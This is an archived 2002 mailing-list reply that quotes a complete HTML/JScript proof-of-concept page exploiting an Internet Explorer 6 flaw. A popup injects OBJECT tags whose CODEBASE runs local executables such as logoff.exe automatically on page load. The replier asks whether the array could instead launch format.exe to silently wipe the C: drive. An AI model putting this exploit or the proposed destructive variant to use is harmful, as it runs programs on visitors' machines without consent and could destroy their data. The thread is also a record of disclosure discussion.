If this is confirmed, could this array by changed to equal, erm...let's
say format.exe (with a couple of parameters to silently format C:/)?

 var programName=new Array(
         'c:/windows/system32/logoff.exe',
         'c:/winxp/system32/logoff.exe',
         'c:/winnt/system32/logoff.exe'

On Wed, 2002-03-13 at 06:06, Magnus Bodin wrote:
> On Tue, Mar 12, 2002 at 11:32:20AM +0100, Magnus Bodin wrote:
> >
> > The latest MSIE-hole is now spreading.
>
> Sorry. Something broke there with the inclusion of the code.
> I've not done any large scale testing of this a part from getting reports
> from a lot of friends and colleagues that they are vulnerable still after
> running windows update.
>
> Here it is, comlete with all the pop-up-code:
>
> --%< cut here-----
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
> <HTML>
> <HEAD>
> <TITLE>IE6 security...</TITLE>
>
> <META http-equiv=Content-Type content="text/html; charset=windows-1252">
> <SCRIPT language=JScript>
>
> var programName=new Array(
> 'c:/windows/system32/logoff.exe',
> 'c:/winxp/system32/logoff.exe',
> 'c:/winnt/system32/logoff.exe'
> );
>
> function Init(){
> var oPopup=window.createPopup();
> var oPopBody=oPopup.document.body;
> var n,html='';
> for(n=0;n<programName.length;n++)
> html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
> oPopBody.innerHTML=html;
> oPopup.show(290, 390, 200, 200, document.body);
> }
>
> </SCRIPT>
> </head>
> <BODY onload="Init()">
> You should feel lucky if you dont have XP right now.
> </BODY>
> </HTML>
> --%< cut here-----
>
>
> --
> magnus MICROS~1 BOB was written in Lisp.
> http://x42.com/

-- 
NyQuist | Matthew Hall -- NyQuist at ntlworld dot com --
http://NyQuist.port5.com
Sig: #define QUESTION ((bb) || !(bb))
ubKey : 649779B0 (certserver.pgp.com)

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]